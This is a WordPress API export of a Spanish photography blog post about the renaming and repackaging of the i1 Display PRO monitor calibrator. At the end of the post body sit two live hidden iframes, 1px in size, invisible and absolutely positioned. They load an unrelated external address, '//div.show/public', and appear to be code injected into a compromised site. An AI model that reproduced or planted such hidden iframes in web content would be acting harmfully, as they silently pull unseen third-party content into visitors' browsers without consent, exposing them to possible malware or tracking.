{"id":15881,"date":"2023-08-18T17:47:32","date_gmt":"2023-08-18T15:47:32","guid":{"rendered":"https:\/\/www.monitor-para-fotografia.com\/?p=15881"},"modified":"2023-11-24T17:23:35","modified_gmt":"2023-11-24T15:23:35","slug":"i1-display-pro-y-su-evolucion-de-embalajes-y-nombres","status":"publish","type":"post","link":"https:\/\/www.monitor-para-fotografia.com\/index.php\/2023\/08\/i1-display-pro-y-su-evolucion-de-embalajes-y-nombres\/","title":{"rendered":"i1 Display PRO y su evoluci\u00f3n de embalajes y nombres"},"content":{"rendered":"<p>El calibrador i1 Display PRO fue lanzado en 2010 y se le ha ido actualizando el firmware al instrumento y realizando peque\u00f1as modificaciones. Pero en esencia es el mismo instrumento.<\/p>\n<p><a href=\"https:\/\/www.microgamma.com\/calibrite\/calibrite-profesional.php\"><img decoding=\"async\" src=\"https:\/\/www.microgamma.com\/0\/i1-display-pro-2021.jpg\" \/><\/a><\/p>\n<p>Pese a ello, se le ha cambiado hasta 3 veces el nombre y el packaging. Pero en programas como ColorNavigator se contin\u00faa identificando como el nombre original. Pese a que han ido a\u00f1adiendo los otros nombres (a fecha de 24-11-2023, la \u00faltima actualizaci\u00f3n \u00abHL\u00bb a\u00fan no aparece, pero el instrumento se sigue identificando igual).<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.microgamma.com\/eizo\/i\/calibrador.jpg\" \/><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>El calibrador i1 Display PRO fue lanzado en 2010 y se le ha ido actualizando el firmware al instrumento y realizando peque\u00f1as modificaciones. Pero en esencia es el mismo instrumento. Pese a ello, se le ha cambiado hasta 3 veces el nombre y el packaging. Pero en programas como ColorNavigator se contin\u00faa identificando como el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":15919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8,10],"tags":[27987,27984,27985,473,814,27986,2628],"class_list":["post-15881","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-calibradores-para-monitor","category-xrite","tag-calibrador-de-monitor-calibrite-display-pro-hl","tag-calibrite","tag-colorcheker-display-pro","tag-i1-display-3","tag-i1-display-pro","tag-i1-display-pro-hl","tag-xrite"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/posts\/15881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/comments?post=15881"}],"version-history":[{"count":0,"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/posts\/15881\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/media\/15919"}],"wp:attachment":[{"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/media?parent=15881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/categories?post=15881"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.monitor-para-fotografia.com\/index.php\/wp-json\/wp\/v2\/tags?post=15881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}